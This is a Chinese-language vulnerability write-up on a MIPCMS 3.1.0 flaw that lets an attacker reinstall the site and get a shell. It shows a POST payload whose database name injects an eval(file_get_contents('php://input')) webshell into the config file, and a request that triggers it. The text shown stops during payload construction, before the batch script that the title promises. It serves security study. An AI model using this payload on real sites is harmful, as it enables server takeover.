MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)

访客 2018年03月29日 14:36 407 0

本文来源:i_春秋

0x01 前言

看下整体的结构，用的是thinkPHP的架构，看到了install这个文件没有可以绕过install.lock进行重装，但是里面有一个一定要验证数据库，又要找一个SQL的注入漏洞。
想起前几天大表哥Bypass发了一篇好像是关于mipcms的漏洞，赶紧去翻了一下，又学到不少技巧，这个技巧可以用在我上次发的一篇ZZCMS 8.2任意文件删除至Getshell的文章，里面有有个getshell的操作，但是也是要数据库的验证，用上这个技巧也不需要SQL注入也可以getshell了。

关于排版问题，我也想了许多，我写的是markdown的格式，但是论坛对于这种格式效果还算挺兼容的，就是看起来有一些不美观，我就换了种方式进行写，之前我都是放代码然后在上面写解析，这样看起来有点密密麻麻，所以我就直接放代码然后在代码里面写注释，有重要的点就写在外面，这样一来看起来整个文章就很整洁了。

0x02 环境

程序源码下载：http://www.mipcms.cn/mipcms-3.1.0.zip
Web环境:Deepin Linux+Apache2+PHP5.6+MySQL（192.168.1.101）
远程数据库服务器:Windows 10 x64（192.168.1.102）

0x03 漏洞利用过程

我们先正常安装程序

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第1张图片-网盾网络安全培训

2.在远程数据库服务器上面开启远程访问，然后在上面建立一个名为test',1=>eval(file_get_contents('php://input')),'2'=>'数据库。

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第2张图片-网盾网络安全培训

3.浏览器访问：http://www.getpass.test//index.php?s=/install/Install/installPost

POST:

username=adminpadding:0;text-decoration:none;font-style:normal;color:#080">password=adminpadding:0;text-decoration:none;font-style:normal;color:#080">3306padding:0;text-decoration:none;font-style:normal;color:#800">',1=>eval(file_get_contents('php://input')),'2'=>'padding:0;text-decoration:none;font-style:normal;color:#080">192.168.1.102padding:0;text-decoration:none;font-style:normal;color:#080">rootpadding:0;text-decoration:none;font-style:normal;color:#080">root

记得里面的数据库对应上你远程数据库服务器的信息！

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第3张图片-网盾网络安全培训

可以看到一句把eval函数写到了配置文件里面了

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第4张图片-网盾网络安全培训

4.执行代码，具体原理我会在后面构造poc的再详细讲解

浏览器访问：http://www.getpass.test/system/config/database.php

POST：phpinfo();

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第5张图片-网盾网络安全培训

0x04 框架知识补充

还有人可能不怎么了解这个thinkPHP的框架，我在这里简单讲解下，最好还是去官方解读下https://www.kancloud.cn/manual/thinkphp5/118003

首先我们现在thinkPHP的配置文件/system/config/config.php里面修改下面这两个为true

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第6张图片-网盾网络安全培训

然后去打开网站(这个适合刚刚搭建还没开始安装)，它会自动跳转到安装的页面。做了刚才的设置后会在右下角出现一个小绿帽，点击就可以看到文件的加载流程。

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第7张图片-网盾网络安全培训

这里有很多文件会预加载，我们主要看它的路由文件Route.php

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第8张图片-网盾网络安全培训

我们可以看到，这里检查了install.lock文件存不存在，如果不存在就会跳转到安装的界面进行安装。

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第9张图片-网盾网络安全培训

0x05 漏洞代码分析过程

/app/install/controller/Install.php问题出现在这个文件，它里面的就在index这里检查的install.lock的存在，但是在installPost这个方法里面却没有检查，也没有做关联，在install.html里面直接就跳过了，从而导致了程序重装。

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第10张图片-网盾网络安全培训

下面直接按照顺序读下面的代码就行了，我都注释好了。就有两个点：

一个是遍历数据库内容那里，我输出了$matches截图这个内容给你们好理解。

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第11张图片-网盾网络安全培训

2.再一个是配置文件的替换，读到$conf = str_replace("#{$key}#", $value, $conf);这句的时候我顺便截图了一个配置的内容。

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第12张图片-网盾网络安全培训

0x06 Payload构造

从上面的代码分析下来，我们可以晓得，必须要传入的值有
username password rpassword dbport dbname dbhost dbuser dbpw
用户名密码这些可以随便写，但是数据库这个在你不晓得数据库信息的时候是无法进行下去的，因为通过上面的代码分析，如果数据库连接不成功就会退出。
看Bypass大表哥的方法，我一想，特么gb，我咋没想到这种方法呢，wocao。dbhost不是可以填服务器地址么，我们在一个服务器上面搭建一个然后进行连接不就行了么，哈哈哈。
数据库的问题解决了，我们要怎么样写到数据库文件里面呢。写到里面的就有这几个值，数据库的服务器地址和用户名密码是不能动的了，因为Mysql用户默认是16位，可以修改位数，但是数据库会把,自动转换为.，数据库密码是加密的，还有prefix这个参数修改了会造成创建表的出现错误导致程序不能正常执行。

MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)-第13张图片-网盾网络安全培训